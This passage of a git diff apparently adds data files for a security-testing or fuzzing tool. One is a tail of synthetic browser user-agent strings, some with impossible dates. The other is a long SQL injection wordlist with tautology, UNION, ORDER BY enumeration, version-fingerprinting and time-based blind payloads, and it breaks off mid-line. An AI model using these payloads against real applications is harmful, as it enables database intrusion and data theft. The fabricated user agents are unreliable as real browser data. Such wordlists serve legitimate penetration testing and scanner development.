OS X) AppleWebKit/534.2 (KHTML, like Gecko) CriOS/13.0.834.0 Mobile/01D273 Safari/534.2 +Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/10.5f1744.0 Mobile/77E447 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.3.5 (KHTML, like Gecko) Version/4.0.3 Safari/533.3.5 +Mozilla/5.0 (Android 2.3.2; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0 +Opera/8.93.(X11; Linux x86_64; doi-IN) Presto/2.9.190 Version/12.00 +Opera/9.89.(X11; Linux i686; ss-ZA) Presto/2.9.166 Version/12.00 +Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/532.35.3 (KHTML, like Gecko) Version/5.1 Safari/532.35.3 +Opera/9.55.(X11; Linux i686; os-RU) Presto/2.9.169 Version/10.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_7; rv:1.9.3.20) Gecko/6508-11-13 15:04:25.747223 Firefox/10.0 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1) +Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/531.0 (KHTML, like Gecko) FxiOS/15.5d8190.0 Mobile/10I820 Safari/531.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/54.0.834.0 Safari/531.1 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/15.0.812.0 Safari/532.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/534.0 (KHTML, like Gecko) FxiOS/15.2i7978.0 Mobile/78U660 Safari/534.0 +Opera/9.43.(X11; Linux i686; kl-GL) Presto/2.9.169 Version/11.00 +Opera/9.71.(Windows NT 6.2; zu-ZA) Presto/2.9.186 Version/12.00 +Opera/9.62.(X11; Linux x86_64; mag-IN) Presto/2.9.168 Version/10.00 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/60.0.871.0 Safari/531.0 +Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/531.23.3 (KHTML, like Gecko) Version/4.1 Safari/531.23.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_4 rv:4.0; id-ID) AppleWebKit/533.7.3 (KHTML, like Gecko) Version/5.0.1 Safari/533.7.3 +Mozilla/5.0 (iPad; CPU iPad OS 4_2_1 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) CriOS/37.0.822.0 Mobile/24C979 Safari/533.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_4; rv:1.9.6.20) Gecko/2412-11-16 12:17:37.911606 Firefox/12.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_6) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/18.0.808.0 Safari/533.2 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.1) +Opera/9.18.(X11; Linux i686; lv-LV) Presto/2.9.160 Version/10.00 +Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/533.17.3 (KHTML, like Gecko) Version/4.0 Safari/533.17.3 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/40.0.886.0 Safari/531.1 +Mozilla/5.0 (Android 4.1.1; Mobile; rv:42.0) Gecko/42.0 Firefox/42.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; lv-LV) AppleWebKit/535.30.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6535.30.1 +Opera/9.84.(X11; Linux x86_64; de-CH) Presto/2.9.173 Version/12.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/5963-10-12 18:11:01.747589 Firefox/4.0 +Mozilla/5.0 (Android 4.4.2; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_5) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/25.0.804.0 Safari/535.0 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/51.0.872.0 Safari/533.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/13.0.881.0 Safari/533.2 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; kl-GL) AppleWebKit/534.19.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6534.19.5 +Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/18.1b6315.0 Mobile/98Z923 Safari/535.2 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0) +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; dz-BT) AppleWebKit/533.6.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6533.6.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_6; rv:1.9.2.20) Gecko/5050-11-19 22:57:39.755997 Firefox/3.8 +Opera/8.12.(Windows CE; kw-GB) Presto/2.9.186 Version/11.00 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; cv-RU) AppleWebKit/535.4.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B112 Safari/6535.4.7 +Opera/8.72.(Windows 98; gd-GB) Presto/2.9.187 Version/10.00 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.38.2 (KHTML, like Gecko) Version/4.0.3 Safari/532.38.2 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/38.0.810.0 Safari/535.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.3.20) Gecko/9782-01-12 03:07:08.113403 Firefox/3.6.12 +Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) CriOS/16.0.896.0 Mobile/66K414 Safari/532.0 +Opera/9.60.(Windows NT 4.0; tk-TM) Presto/2.9.181 Version/10.00 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/532.16.4 (KHTML, like Gecko) Version/5.0 Safari/532.16.4 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/4.0) +Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/13.9v6101.0 Mobile/85X309 Safari/535.2 +Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/29.0.892.0 Safari/533.2 +Opera/9.69.(X11; Linux i686; be-BY) Presto/2.9.176 Version/12.00 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/9567-08-24 10:22:16.076965 Firefox/3.6.15 +Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/5.0) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_0 rv:6.0; st-ZA) AppleWebKit/535.27.6 (KHTML, like Gecko) Version/4.0.5 Safari/535.27.6 +Mozilla/5.0 (Windows NT 5.01; nhn-MX; rv:1.9.0.20) Gecko/2379-07-24 10:22:25.950911 Firefox/15.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0; rv:1.9.5.20) Gecko/9546-11-25 18:31:22.172852 Firefox/7.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_2; rv:1.9.2.20) Gecko/3076-12-03 12:01:04.416962 Firefox/3.6.10 +Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/12.7q9299.0 Mobile/81W496 Safari/536.0 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/45.0.884.0 Mobile/85I703 Safari/531.1 +Mozilla/5.0 (Windows; U; Windows 98) AppleWebKit/535.2.1 (KHTML, like Gecko) Version/5.0.5 Safari/535.2.1 +Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/533.3.7 (KHTML, like Gecko) Version/4.0.3 Safari/533.3.7 +Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/14.3m7865.0 Mobile/04J014 Safari/536.0 +Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/14.8w4697.0 Mobile/83K145 Safari/533.0 +Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/14.0.869.0 Safari/533.1 +Opera/8.72.(Windows 98; sd-PK) Presto/2.9.190 Version/11.00 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/18.0.885.0 Safari/533.0 +Opera/8.15.(X11; Linux i686; so-DJ) Presto/2.9.161 Version/11.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/3.1) +Opera/9.51.(Windows NT 5.2; gd-GB) Presto/2.9.176 Version/12.00 +Opera/9.31.(Windows 98; Win 9x 4.90; hy-AM) Presto/2.9.190 Version/10.00 +Opera/9.86.(Windows 98; Win 9x 4.90; os-RU) Presto/2.9.170 Version/11.00 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_1; rv:1.9.5.20) Gecko/8648-02-29 06:08:19.367676 Firefox/3.6.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_6 rv:4.0; wo-SN) AppleWebKit/535.30.3 (KHTML, like Gecko) Version/4.0 Safari/535.30.3 +Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/11.2g9827.0 Mobile/00Z542 Safari/535.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/534.7.1 (KHTML, like Gecko) Version/5.0.1 Safari/534.7.1 +Mozilla/5.0 (compatible; MSIE 9.0; Windows 95; Trident/3.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; rv:1.9.4.20) Gecko/7236-12-16 12:18:13.590759 Firefox/3.8 +Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/46.0.845.0 Safari/531.2 +Opera/9.85.(X11; Linux x86_64; shs-CA) Presto/2.9.178 Version/11.00 +Mozilla/5.0 (Android 8.0.0; Mobile; rv:26.0) Gecko/26.0 Firefox/26.0 +Opera/8.23.(X11; Linux i686; aa-DJ) Presto/2.9.182 Version/12.00 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.12.1 (KHTML, like Gecko) Version/5.0.1 Safari/531.12.1 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/3547-06-27 11:28:37.447731 Firefox/3.8 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_6; rv:1.9.3.20) Gecko/6079-03-12 09:40:27.410263 Firefox/3.8 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/46.0.852.0 Safari/533.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/44.0.838.0 Safari/536.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/28.0.817.0 Safari/531.0 +Mozilla/5.0 (Android 3.2.5; Mobile; rv:60.0) Gecko/60.0 Firefox/60.0 +Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.5.6 (KHTML, like Gecko) Version/4.0.5 Safari/535.5.6 +Opera/9.58.(X11; Linux i686; iu-CA) Presto/2.9.168 Version/12.00 +Opera/8.54.(Windows CE; wo-SN) Presto/2.9.179 Version/10.00 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_2 rv:6.0; sq-AL) AppleWebKit/535.22.4 (KHTML, like Gecko) Version/4.0.5 Safari/535.22.4 +Mozilla/5.0 (iPad; CPU iPad OS 4_2_1 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) FxiOS/16.8c9097.0 Mobile/75D224 Safari/536.2 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/5.1) +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; bo-CN) AppleWebKit/532.45.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6532.45.6 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/35.0.826.0 Safari/534.0 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.0) +Opera/8.67.(Windows NT 6.2; id-ID) Presto/2.9.160 Version/11.00 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/36.0.880.0 Safari/535.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_6 rv:4.0; cv-RU) AppleWebKit/534.9.6 (KHTML, like Gecko) Version/5.0 Safari/534.9.6 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Trident/4.0) +Opera/9.81.(X11; Linux i686; cmn-TW) Presto/2.9.178 Version/10.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5 rv:6.0; gl-ES) AppleWebKit/534.23.2 (KHTML, like Gecko) Version/4.1 Safari/534.23.2 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; it-IT) AppleWebKit/535.44.3 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.44.3 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_0 rv:2.0; hy-AM) AppleWebKit/535.31.4 (KHTML, like Gecko) Version/5.0.4 Safari/535.31.4 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_12_4 rv:4.0; hr-HR) AppleWebKit/534.43.2 (KHTML, like Gecko) Version/4.0.4 Safari/534.43.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_5 rv:6.0; mg-MG) AppleWebKit/532.10.1 (KHTML, like Gecko) Version/4.0.1 Safari/532.10.1 +Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/15.4m7517.0 Mobile/83X938 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.5.1 (KHTML, like Gecko) Version/5.0.4 Safari/532.5.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/3.0) +Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/531.2 (KHTML, like Gecko) CriOS/54.0.845.0 Mobile/77L461 Safari/531.2 +Opera/9.96.(Windows 98; Win 9x 4.90; mn-MN) Presto/2.9.180 Version/12.00 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/7205-04-30 19:09:51.166718 Firefox/10.0 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/28.0.817.0 Safari/535.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_7) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/55.0.835.0 Safari/536.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/24.0.880.0 Safari/531.1 +Mozilla/5.0 (Linux; Android 2.3.5) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/20.0.894.0 Safari/535.0 +Opera/8.23.(Windows NT 10.0; fo-FO) Presto/2.9.188 Version/12.00 +Opera/8.16.(Windows 95; be-BY) Presto/2.9.169 Version/12.00 +Opera/8.29.(Windows NT 6.2; om-ET) Presto/2.9.173 Version/10.00 +Mozilla/5.0 (Windows NT 5.0; pt-PT; rv:1.9.2.20) Gecko/9951-12-30 00:44:24.630219 Firefox/5.0 +Mozilla/5.0 (Android 4.0.1; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/20.0.888.0 Safari/534.2 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/59.0.891.0 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.9.4 (KHTML, like Gecko) Version/4.0.4 Safari/534.9.4 +Opera/9.38.(X11; Linux i686; tl-PH) Presto/2.9.185 Version/11.00 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/3.1) +Mozilla/5.0 (Windows; U; Windows NT 10.0) AppleWebKit/533.10.5 (KHTML, like Gecko) Version/5.0 Safari/533.10.5 +Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0) +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/22.0.868.0 Safari/535.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/54.0.895.0 Safari/535.2 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/8408-02-19 08:49:41.447388 Firefox/3.8 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/5185-06-02 12:32:44.162292 Firefox/3.8 +Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/534.43.2 (KHTML, like Gecko) Version/4.1 Safari/534.43.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/29.0.802.0 Safari/532.1 +Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Win 9x 4.90; Trident/3.0) +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ks-IN) AppleWebKit/535.6.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6535.6.1 +Opera/8.76.(X11; Linux i686; hsb-DE) Presto/2.9.174 Version/12.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_7) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/62.0.843.0 Safari/536.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/33.0.881.0 Safari/536.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_2; rv:1.9.3.20) Gecko/5678-06-30 17:45:36.739685 Firefox/3.8 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_11_3; rv:1.9.2.20) Gecko/7392-09-29 01:56:11.388031 Firefox/3.8 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; sq-AL) AppleWebKit/533.24.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6533.24.4 +Mozilla/5.0 (Linux; Android 11) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/28.0.852.0 Safari/535.0 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.1) +Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535.28.3 (KHTML, like Gecko) Version/5.0 Safari/535.28.3 +Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/532.9.6 (KHTML, like Gecko) Version/4.1 Safari/532.9.6 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) FxiOS/10.9u2345.0 Mobile/06G828 Safari/535.1 +Opera/8.10.(Windows NT 5.1; es-PE) Presto/2.9.185 Version/12.00 +Opera/8.18.(Windows NT 6.2; dv-MV) Presto/2.9.166 Version/11.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.1) +Mozilla/5.0 (Linux; Android 10) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/24.0.849.0 Safari/534.1 +Mozilla/5.0 (compatible; MSIE 8.0; Windows 98; Trident/4.1) +Mozilla/5.0 (Linux; Android 6.0) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/60.0.865.0 Safari/533.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 4.0; Trident/4.1) +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.42.2 (KHTML, like Gecko) Version/5.0.5 Safari/531.42.2 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.3.5 (KHTML, like Gecko) Version/4.0.2 Safari/534.3.5 diff --git a/datasets/sql-injection.txt b/datasets/sql-injection.txt new file mode 100644 index 0000000..ba5c63a --- /dev/null +++ b/datasets/sql-injection.txt @@ -0,0 +1,808 @@ +OR 1=1 + OR 1=0 + OR x=x + OR x=y + OR 1=1# + OR 1=0# + OR x=x# + OR x=y# + OR 1=1-- + OR 1=0-- + OR x=x-- + OR x=y-- + OR 3409=3409 AND ('pytW' LIKE 'pytW + OR 3409=3409 AND ('pytW' LIKE 'pytY + HAVING 1=1 + HAVING 1=0 + HAVING 1=1# + HAVING 1=0# + HAVING 1=1-- + HAVING 1=0-- + AND 1=1 + AND 1=0 + AND 1=1-- + AND 1=0-- + AND 1=1# + AND 1=0# + AND 1=1 AND '%'=' + AND 1=0 AND '%'=' + AND 1083=1083 AND (1427=1427 + AND 7506=9091 AND (5913=5913 + AND 1083=1083 AND ('1427=1427 + AND 7506=9091 AND ('5913=5913 + AND 7300=7300 AND 'pKlZ'='pKlZ + AND 7300=7300 AND 'pKlZ'='pKlY + AND 7300=7300 AND ('pKlZ'='pKlZ + AND 7300=7300 AND ('pKlZ'='pKlY + AS INJECTX WHERE 1=1 AND 1=1 + AS INJECTX WHERE 1=1 AND 1=0 + AS INJECTX WHERE 1=1 AND 1=1# + AS INJECTX WHERE 1=1 AND 1=0# + AS INJECTX WHERE 1=1 AND 1=1-- + AS INJECTX WHERE 1=1 AND 1=0-- + WHERE 1=1 AND 1=1 + WHERE 1=1 AND 1=0 + WHERE 1=1 AND 1=1# + WHERE 1=1 AND 1=0# + WHERE 1=1 AND 1=1-- + WHERE 1=1 AND 1=0-- + ORDER BY 1-- + ORDER BY 2-- + ORDER BY 3-- + ORDER BY 4-- + ORDER BY 5-- + ORDER BY 6-- + ORDER BY 7-- + ORDER BY 8-- + ORDER BY 9-- + ORDER BY 10-- + ORDER BY 11-- + ORDER BY 12-- + ORDER BY 13-- + ORDER BY 14-- + ORDER BY 15-- + ORDER BY 16-- + ORDER BY 17-- + ORDER BY 18-- + ORDER BY 19-- + ORDER BY 20-- + ORDER BY 21-- + ORDER BY 22-- + ORDER BY 23-- + ORDER BY 24-- + ORDER BY 25-- + ORDER BY 26-- + ORDER BY 27-- + ORDER BY 28-- + ORDER BY 29-- + ORDER BY 30-- + ORDER BY 31337-- + ORDER BY 1# + ORDER BY 2# + ORDER BY 3# + ORDER BY 4# + ORDER BY 5# + ORDER BY 6# + ORDER BY 7# + ORDER BY 8# + ORDER BY 9# + ORDER BY 10# + ORDER BY 11# + ORDER BY 12# + ORDER BY 13# + ORDER BY 14# + ORDER BY 15# + ORDER BY 16# + ORDER BY 17# + ORDER BY 18# + ORDER BY 19# + ORDER BY 20# + ORDER BY 21# + ORDER BY 22# + ORDER BY 23# + ORDER BY 24# + ORDER BY 25# + ORDER BY 26# + ORDER BY 27# + ORDER BY 28# + ORDER BY 29# + ORDER BY 30# + ORDER BY 31337# + ORDER BY 1 + ORDER BY 2 + ORDER BY 3 + ORDER BY 4 + ORDER BY 5 + ORDER BY 6 + ORDER BY 7 + ORDER BY 8 + ORDER BY 9 + ORDER BY 10 + ORDER BY 11 + ORDER BY 12 + ORDER BY 13 + ORDER BY 14 + ORDER BY 15 + ORDER BY 16 + ORDER BY 17 + ORDER BY 18 + ORDER BY 19 + ORDER BY 20 + ORDER BY 21 + ORDER BY 22 + ORDER BY 23 + ORDER BY 24 + ORDER BY 25 + ORDER BY 26 + ORDER BY 27 + ORDER BY 28 + ORDER BY 29 + ORDER BY 30 + ORDER BY 31337 + RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' + RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' +IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- +IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- +%' AND 8310=8310 AND '%'=' +%' AND 8310=8311 AND '%'=' + and (select substring(@@version,1,1))='X' + and (select substring(@@version,1,1))='M' + and (select substring(@@version,2,1))='i' + and (select substring(@@version,2,1))='y' + and (select substring(@@version,3,1))='c' + and (select substring(@@version,3,1))='S' + and (select substring(@@version,3,1))='X' +' +'' +` +`` +, +" +"" +/ +// +\ +\\ +; +' or " +-- or # +' OR '1 +' OR 1 -- - +" OR "" = " +" OR 1 = 1 -- - +' OR '' = ' +'=' +'LIKE' +'=0--+ + OR 1=1 +' OR 'x'='x +' AND id IS NULL; -- +'''''''''''''UNION SELECT '2 +%00 +/*…*/ ++ addition, concatenate (or space in url) +|| (double pipe) concatenate +% wildcard attribute indicator +@variable local variable +@@variable global variable +# Numeric +AND 1 +AND 0 +AND true +AND false +1-false +1-true +1*56 +-2 +1' ORDER BY 1--+ +1' ORDER BY 2--+ +1' ORDER BY 3--+ +1' ORDER BY 1,2--+ +1' ORDER BY 1,2,3--+ +1' GROUP BY 1,2,--+ +1' GROUP BY 1,2,3--+ +' GROUP BY columnnames having 1=1 -- +-1' UNION SELECT 1,2,3--+ +' UNION SELECT sum(columnname ) from tablename -- +-1 UNION SELECT 1 INTO @,@ +-1 UNION SELECT 1 INTO @,@,@ +1 AND (SELECT * FROM Users) = 1 +' AND MID(VERSION(),1,1) = '5'; +' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- +Finding the table name +Time-Based: +,(select * from (select(sleep(10)))a) +%2c(select%20*%20from%20(select(sleep(10)))a) +';WAITFOR DELAY '0:0:30'-- +# from wapiti +sleep(5)# +1 or sleep(5)# +" or sleep(5)# +' or sleep(5)# +" or sleep(5)=" +' or sleep(5)=' +1) or sleep(5)# +") or sleep(5)=" +') or sleep(5)=' +1)) or sleep(5)# +")) or sleep(5)=" +')) or sleep(5)=' +;waitfor delay '0:0:5'-- +);waitfor delay '0:0:5'-- +';waitfor delay '0:0:5'-- +";waitfor delay '0:0:5'-- +');waitfor delay '0:0:5'-- +");waitfor delay '0:0:5'-- +));waitfor delay '0:0:5'-- +'));waitfor delay '0:0:5'-- +"));waitfor delay '0:0:5'-- +benchmark(10000000,MD5(1))# +1 or benchmark(10000000,MD5(1))# +" or benchmark(10000000,MD5(1))# +' or benchmark(10000000,MD5(1))# +1) or benchmark(10000000,MD5(1))# +") or benchmark(10000000,MD5(1))# +') or benchmark(10000000,MD5(1))# +1)) or benchmark(10000000,MD5(1))# +")) or benchmark(10000000,MD5(1))# +')) or benchmark(10000000,MD5(1))# +pg_sleep(5)-- +1 or pg_sleep(5)-- +" or pg_sleep(5)-- +' or pg_sleep(5)-- +1) or pg_sleep(5)-- +") or pg_sleep(5)-- +') or pg_sleep(5)-- +1)) or pg_sleep(5)-- +")) or pg_sleep(5)-- +')) or pg_sleep(5)-- +AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe +AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' +AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) +AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- +AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# +SLEEP(5)# +SLEEP(5)-- +SLEEP(5)=" +SLEEP(5)=' +or SLEEP(5) +or SLEEP(5)# +or SLEEP(5)-- +or SLEEP(5)=" +or SLEEP(5)=' +waitfor delay '00:00:05' +waitfor delay '00:00:05'-- +waitfor delay '00:00:05'# +benchmark(50000000,MD5(1)) +benchmark(50000000,MD5(1))-- +benchmark(50000000,MD5(1))# +or benchmark(50000000,MD5(1)) +or benchmark(50000000,MD5(1))-- +or benchmark(50000000,MD5(1))# +pg_SLEEP(5) +pg_SLEEP(5)-- +pg_SLEEP(5)# +or pg_SLEEP(5) +or pg_SLEEP(5)-- +or pg_SLEEP(5)# +'\" +AnD SLEEP(5) +AnD SLEEP(5)-- +AnD SLEEP(5)# +&&SLEEP(5) +&&SLEEP(5)-- +&&SLEEP(5)# +' AnD SLEEP(5) ANd '1 +'&&SLEEP(5)&&'1 +ORDER BY SLEEP(5) +ORDER BY SLEEP(5)-- +ORDER BY SLEEP(5)# +(SELECT * FROM 